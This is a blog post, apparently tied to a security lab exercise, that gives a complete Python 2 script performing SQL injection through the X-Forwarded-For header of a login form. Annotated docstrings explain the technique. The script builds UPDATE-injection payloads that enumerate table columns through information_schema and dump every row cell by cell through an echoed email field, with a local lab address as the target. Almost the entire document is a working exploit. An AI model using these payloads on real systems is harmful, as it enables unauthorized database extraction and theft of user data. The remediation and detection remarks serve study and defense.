版權聲明:轉載請注明出處:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396413
參考實驗:
http://www.hetianlab.com/expc.do?ce=572fa9e9-7eb1-4928-bfe3-eaa444eab1e0 sqlupdateattack.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import HTMLParser
import urlparse
import urllib
import urllib2
import cookielib
import string
import binascii
import re
import time
#截取字元串中startStr,endStr中間的值
def GetMiddleStr(content,startStr,endStr):
    """Return the shortest text between the first ``startStr`` and the next ``endStr`` in ``content``.

    Both markers are interpolated into a regular expression verbatim (they are
    not escaped), so a marker containing regex metacharacters changes the
    pattern rather than being matched literally; the search spans newlines.
    Returns None when the pair of markers is not found.
    """
    marker_pattern = re.compile(startStr + '(.+?)' + endStr, re.S)
    found = marker_pattern.search(content)
    return found.group(1) if found else None
#跑表數量
def count(table_name,mode):
    """Return the X-Forwarded-For value that makes the lab page echo a count.

    From the shape of the value, the lab application evidently copies the
    X-Forwarded-For header into an UPDATE by string concatenation: the value
    closes the quoted IP, appends ``email=(<subquery>)`` plus a
    ``where username='admin'`` clause, and comments out the rest of the original
    statement with ``#``. ``inject`` then reads the subquery result back from the
    "your email is:" text of the response.

    Args:
        table_name: table whose count is wanted.
        mode: 0 -> number of columns of ``table_name`` listed in
            information_schema.columns (restricted with
            ``table_schema=database()``); any other value -> number of rows.

    Returns:
        The header string to pass to ``inject``.

    Server-side remediation is a parameterized UPDATE and validating
    X-Forwarded-For as an IP address before storing it (the header is
    client-controlled). A header value containing quotes, ``select`` or ``#``
    instead of an address is also a simple log/WAF detection.
    """
    if mode==0:
        # Hex-literal form of the table name, so the fragment needs no quote
        # characters around it. b2a_hex returns str on Python 2 (this script is
        # Python 2: print statements, urllib2); on Python 3 it would return
        # bytes and the concatenation below would fail.
        tn16=binascii.b2a_hex(table_name.encode("utf8"))
        sql_count='1.1.1.1\',email=(select count(COLUMN_NAME) from information_schema.columns where table_name=0x'+tn16+' and table_schema=database()) where username=\'admin\'#'
    else:
        if table_name=='testuser':
            # testuser is the table the UPDATE itself writes to; the original
            # comment on sql_users says reading it directly conflicts with the
            # update, hence the derived table ``( select * from testuser) as x``.
            sql_count='1.1.1.1\',email=(select count(*) from ( select * from testuser) as x) where username=\'admin\'#'
        else:
            sql_count='1.1.1.1\',email=(select count(*) from '+table_name+') where username=\'admin\'#'
    return sql_count
#跑表的列名用到的sql注入語句
def sql_column(table_name,num):
    """Return the header value that echoes one column name of ``table_name``.

    Same UPDATE-injection shape as ``count``; the subquery reads
    information_schema.columns with ``limit num,1``, so each request returns a
    single column name through the email field.

    Args:
        table_name: table to list columns for (sent as a hex literal).
        num: zero-based offset of the column name to return.

    Returns:
        The header string to pass to ``inject``.
    """
    tn16=binascii.b2a_hex(table_name.encode("utf8"))
    # The local shadows the function name inside the body; harmless here since
    # the function does not call itself.
    sql_column='1.1.1.1\',email=(select COLUMN_NAME from information_schema.columns where table_name=0x'+tn16+' limit '+str(num)+',1 ) where username=\'admin\'#'
    return sql_column
#跑表的内容
def sql_data(table_name,column,num):
    """Return the header value that echoes one cell of ``table_name``.

    ``table_name`` and ``column`` are concatenated into the subquery verbatim;
    rows are ordered by ``id`` and selected with ``limit num,1``, one cell per
    request. Used for every table except ``testuser`` (see ``sql_users``).

    Args:
        table_name: table to read from.
        column: column to read.
        num: zero-based row offset.

    Returns:
        The header string to pass to ``inject``.
    """
    sql_data='1.1.1.1\',email=(select '+column+' from '+table_name+' order by id limit '+str(num)+',1) where username=\'admin\'#'
    return sql_data
#跑表的内容(與update所用表(即示範中的testuser表)沖突使用)
def sql_users(column,num):
    """Return the header value that echoes one cell of the ``testuser`` table.

    Variant of ``sql_data`` for the table the UPDATE itself targets: per the
    original comment, reading it directly conflicts with the update, so the
    subquery goes through the derived table ``( select * from testuser) as x``.
    Note the ordering column is spelled ``ID`` here and ``id`` in ``sql_data``.

    Args:
        column: column to read.
        num: zero-based row offset.

    Returns:
        The header string to pass to ``inject``.
    """
    sql_users='1.1.1.1\',email=(select '+column+' from ( select * from testuser) as x order by ID limit '+str(num)+',1) where username=\'admin\'#'
    return sql_users
#注入,先模拟登陸後截取結果并寫入檔案
def inject(posturl,sql):
    """POST the lab login form once with ``sql`` in X-Forwarded-For and return the echoed email text.

    Args:
        posturl: URL of the login handler.
        sql: header value built by ``count``/``sql_column``/``sql_data``/``sql_users``.

    Returns:
        The text between 'your email is:' and '</font><br>' in the response
        body, or None when those markers are absent (see ``GetMiddleStr``).

    Raises:
        Exception: with the fixed message 'weberror' for any failure inside the
        try block. The caught exception is discarded, so the cause (refused
        connection, HTTP error, ...) is not reported to the caller.
    """
    try:
        # A fresh cookie jar per call: every request is an independent login.
        cookieJar=cookielib.CookieJar()
        opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookieJar))
        # The SQL fragment travels in X-Forwarded-For. Server side, a value in
        # this header that is not an IP address is the thing to reject or
        # alert on.
        headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04',
                   'X-Forwarded-For' : sql}
        postData = {'uname' : 'admin',
                    'passwd' : 'admin',
                    'submit' : 'Submit' }
        postData = urllib.urlencode(postData)
        request = urllib2.Request(posturl, postData, headers)
        result = opener.open(request)
        # NOTE(review): ``str`` shadows the builtin for the rest of this
        # function, and ``result`` is never closed.
        str=result.read()
        m=GetMiddleStr(str,'your email is:','</font><br>')
        return m
    except Exception,err:
        # NOTE(review): the caught error is overwritten before being re-raised,
        # so all diagnostic detail is lost.
        err = 'weberror'
        raise Exception(err)
if __name__ == '__main__':
    # NOTE(review): the pasted source had lost its indentation; the nesting
    # below is reconstructed (the data loop reads ``table``, so it is placed
    # inside the per-table loop) and should be confirmed against the upstream
    # file.
    # Local lab instance from the referenced exercise.
    posturl = 'http://127.0.0.1/test/index.php'
    table_name=['testuser', 'test1']
    # First pass per table: collect its column names into column_name.
    # NOTE(review): column_name is never cleared between tables, so for the
    # second table the data loop also iterates the first table's column names;
    # presumably unintended.
    column_name=[]
    for table in table_name:
        # Column count, returned as text in the echoed email field.
        sql_count=inject(posturl,count(table,0))
        print table+":\r\n"
        for num in range(int(sql_count)):
            sql=sql_column(table,num)
            try:
                m=inject(posturl,sql)
                column_name.append(m)
            except TypeError:
                # NOTE(review): inject raises a plain Exception('weberror'),
                # never TypeError, so this handler does not catch its failures.
                print 'error'
        print column_name
        # Second pass: one request per (column, row), row count from count(table,1).
        for column in column_name:
            print table+"|||"+column+":"
            for num in range(int(inject(posturl,count(table,1)))):
                # testuser is the table the UPDATE writes to, so it needs the
                # derived-table variant.
                if table=='testuser':
                    sql=sql_users(column,num)
                else:
                    sql=sql_data(table,column,num)
                m=inject(posturl,sql)
                print m
            print "\n"